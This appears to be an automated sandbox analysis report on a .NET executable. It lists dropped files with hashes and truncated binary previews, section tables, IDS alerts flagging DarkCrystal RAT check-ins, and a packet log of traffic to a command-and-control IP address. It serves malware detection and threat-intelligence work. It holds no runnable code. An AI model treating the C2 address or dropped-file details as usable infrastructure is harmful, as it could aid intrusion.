                                                                    SHA-512:2FE5972DDDD0CD16FA2D67BD736A58A57FA3AA649D4E39B715DFD836608C28ECE3E67A2272905F93592A10ECD4C7CBA47281E2577436E9D560CF6A04668B2474
                                                                    Malicious:false
                                                                    Preview:UcuJbfm0m4pHjw8jdeknWjW3ZVHQzk0Hk7QLPJAVlmCtXsFT7ekMpBrvG1uFXVACDhg
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (453), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):453
                                                                    Entropy (8bit):5.851386074137753
                                                                    Encrypted:false
                                                                    SSDEEP:12:QEFRYd/19BeCwygOcHcQP4D5pcoQCiD0ODtlio45:QU6/8CW/HcPDQof2jC5
                                                                    MD5:73CC5F799337E791917A83C2A078BCE1
                                                                    SHA1:4A08BC220007D7B0BF104691D14C16CC302D98B2
                                                                    SHA-256:77E21860B1854731CDEFF346F96E5A2F7DA4899BC7E1216F558C02DE62B717B5
                                                                    SHA-512:9867CB2B34DA14A3A91AE2FA239CB24D58E039ECBDF073D936A632706A2ECC7F881E56D63A51B959A29F9B7503E8F146A4462E700838E2F8B70329D1DB77900B
                                                                    Malicious:false
                                                                    Preview:YSOvuaGr5vYtzBQezqT417OcEwNUD6U942ycgbAsgRL8wEYjsSDgMDkaDvr8Mvn8bYz6Ny7XqlYjwPqAXomv3xx0SXYvtBfvnMhYOcV4Up0koAoxFrkhI2Fnl8n0aLooFn5jsRv5TsbN7MLRskqCb8mvH4xQyfeIBLeBEEFx5pOaa1qYwWHzflNHBKcyeeGxNSMvsKMne2HvtLUPNYecXoma8XA4mRSbibMIp5qmJdVmdbXzzMkFAoZjpvwUJRBMkqNS9MjRs2S4T96hALFZqMa3Bnc4IVc2cICxNEzmnSXIWfQpzPU8MlfXPURWupJXaabK7IT5VcwYzSgfWwE3Bdp1mpi3xd28J9s6EFsq6YntzHh7yv97kQV6ujhSkaI1jyOzjjbRDY6nz5CfHlEBe5X3ovMehaGfQwKA2rXOUr3MTsGyhCK9VGWoaVLyX6tnRbWDv
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1224
                                                                    Entropy (8bit):4.435108676655666
                                                                    Encrypted:false
                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                    Malicious:false
                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.9574413302532645
                                                                    Encrypted:false
                                                                    SSDEEP:48:6vJzPt5M7Jt8Bs3FJsdcV4MKe27QPvqBHWOulajfqXSfbNtm:iPYPc+Vx9MQPvkwcjRzNt
                                                                    MD5:910F48243DDBA79AE6524E0A40DDAAF7
                                                                    SHA1:F3286746415C2081817AFCD413670D4F4D807765
                                                                    SHA-256:3F544AB1D24106D41E9612091C6B0C20DBAA296DCD77C74AB336B590CD6E825F
                                                                    SHA-512:2FB23F9CA14F84C318EF480CEE1FF9D32ADB3166DA513428674B8F826E4E64FC81008936CD63D14B01B263B32BE7715CDC72810C2181ADC640118A631DE57D52
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*g.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                    Process:C:\Windows\System32\PING.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):502
                                                                    Entropy (8bit):4.630609828667227
                                                                    Encrypted:false
                                                                    SSDEEP:12:PZg5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:RCdUOAokItULVDv
                                                                    MD5:E15540C580CF702F6C8BE9958C61CB2F
                                                                    SHA1:89B0FA335306144C0F2E7F652E0DE4BDC938292B
                                                                    SHA-256:BE4AAD886C653F42DB9D2C0A2977A2505E4415CBEF6283149FDA79A296AD7051
                                                                    SHA-512:F7CDDB2B7BB373852F03B932E170A18D10D4B3A8F2CF422FE5CF5F64EC0D0847D890FD44682CC2E552A82D4921CBCC41FB6A87B6CFC761ED8B05D74D8E71ADFE
                                                                    Malicious:false
                                                                    Preview:..Pinging 724536 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.457136013265021
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:EQdhBjQw4G.exe
                                                                    File size:1'719'296 bytes
                                                                    MD5:477db3de46b7779b63495a8bdb279f2c
                                                                    SHA1:77dc3f7d83728294c49298db82dd0e668adc3a73
                                                                    SHA256:8b0b6f7ba3c1c98fdc17ceb74e37057793e104dc92aa4d4319d71411b3e56366
                                                                    SHA512:4ac940fa7ce3c8a2a646639a5b00c5c8a1dcafcfba460782068446a321455cf5af10e1e6ae4e6753150beab7d2431a7c38192787b32c4e508b73f4b3ac843956
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    TLSH:1F858C1665E28E73C2B41B318156013E82E1D7667562FB1B3A1F2093A80B7F58F736B7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@................................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x5a527e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x672125E5 [Tue Oct 29 18:13:57 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a5230 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a6000 | 0x320 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1a3284 | 0x1a3400 | f338a68622aac0c83d7e3ad9273996c9 | False | 0.7531265140503876 | data | 7.4610435048156285 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1a6000 | 0x320 | 0x400 | 2d725e62fa0c42d372df85f61a02d758 | False | 0.3525390625 | data | 2.6537284131589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1a8000 | 0xc | 0x200 | 3b644b6f25cb7417131a4ffa7ddd9644 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1a6058 | 0x2c8 | data |  |  | 0.46207865168539325

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-06T03:37:15.592448+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | TCP
2024-11-06T03:37:17.712560+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-06T03:37:57.199859+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49784 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Nov 6, 2024 03:37:19.850281954 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850297928 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850306988 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850348949 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850444078 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850454092 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850496054 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850543022 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850583076 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850704908 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850831985 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855041981 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855228901 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855308056 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855333090 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855343103 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855351925 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855360985 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855379105 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855391026 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855398893 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855427027 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855436087 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855443954 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855474949 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855488062 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.855583906 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855698109 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.855709076 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860295057 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860308886 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860318899 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860369921 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860378981 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860388041 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860399008 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860407114 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860423088 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.860430956 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.125818968 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.130830050 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.585585117 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.625627041 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.656322002 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.764262915 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:20.828795910 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.844352961 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.997206926 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.997271061 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:20.998034000 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002604008 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.002650976 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002897978 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.002955914 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.002991915 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.003082991 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.003155947 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.007883072 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.391925097 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:21.396786928 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.813747883 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.889919043 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:21.890007019 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.025568962 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.026222944 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.030729055 CET804974337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.030793905 CET4974380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.031135082 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.031215906 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.031343937 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.036087036 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.375691891 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.380615950 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.769545078 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.774364948 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.774444103 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.779226065 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.784066916 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.788645029 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.793847084 CET804974437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.793895960 CET4974480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.924765110 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.929611921 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:22.929680109 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.929759979 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:22.934500933 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.125720024 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.130563974 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.130614042 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.282084942 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.286870003 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.592039108 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.665405989 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.665457964 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:23.739573956 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.809732914 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:23.809886932 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.422997952 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.423062086 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.423708916 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428474903 CET804974737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.428541899 CET4974780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428818941 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.428879976 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.428978920 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.429198027 CET804974837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.429246902 CET4974880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.433779955 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:24.781956911 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:24.786818027 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.241245031 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.316793919 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.316843033 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.317692041 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.322926998 CET804974937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.322971106 CET4974980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.434403896 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.439630985 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.439696074 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.439796925 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.445058107 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:25.797646046 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:25.802963018 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.250081062 CET804975137.44.238.250192.168.2.4
